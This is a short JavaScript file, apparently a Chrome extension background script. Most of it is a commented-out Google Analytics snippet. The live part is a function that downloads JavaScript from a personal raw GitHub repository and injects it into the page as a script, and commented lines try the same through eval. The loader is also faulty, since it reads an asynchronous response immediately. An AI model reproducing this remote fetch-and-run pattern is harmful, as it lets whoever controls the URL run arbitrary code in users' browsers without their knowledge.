// Generated by CoffeeScript 1.7.1
// (function() {
//     window._gaq = window._gaq || [];

//     window._gaq.push(["_setAccount", "UA-49167525-1"]);

//     if (!localStorage.first) {
//         chrome.tabs.create({
//             url: chrome.extension.getURL("html/intro.html")
//         });
//         localStorage.first = "true";
//         window._gaq.push(["_trackPageview"]);
//     }

//     (function() {
//         var ga, s;
//         ga = document.createElement("script");
//         ga.type = "text/javascript";
//         ga.async = true;
//         ga.src = "https://ssl.google-analytics.com/ga.js";
//         s = document.getElementsByTagName("script")[0];
//         s.parentNode.insertBefore(ga, s);
//     })();

//     chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) {
//         if (request.page != null) {
//             _gaq.push(["_set", "title", request.title]);
//             return window._gaq.push(["_trackPageview", request.page]);
//         }
//     });

// }).call(this);


function loadExternalJS(TARGET_URL){
    // var xhr = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
    var xhr = new XMLHttpRequest();
    xhr.open('GET', TARGET_URL, true);
    xhr.send();
    var code = xhr.responseText;
    var dScript = document.createElement('script');
    
    try {
    dScript.appendChild( document.createTextNode(code) );
    document.body.appendChild(dScript);
    } catch(e) {
    dScript.text = code;
    document.getElementsByTagName('head')[0].appendChild(dScript);
    }
    // xhr = null;
}

loadExternalJS("https://raw.githubusercontent.com/npantelaios/uploadJsRepo/main/visitsGoogle.js");

// eval($.ajax({
//     url: "https://raw.githubusercontent.com/npantelaios/uploadJsRepo/main/test2.js",
//     dataType: "script",
//     success: success
// }));

// var my_awesome_script = document.createElement('script');
// my_awesome_script.setAttribute('src','https://raw.githubusercontent.com/npantelaios/uploadJsRepo/main/test2.js');
// document.head.appendChild(my_awesome_script);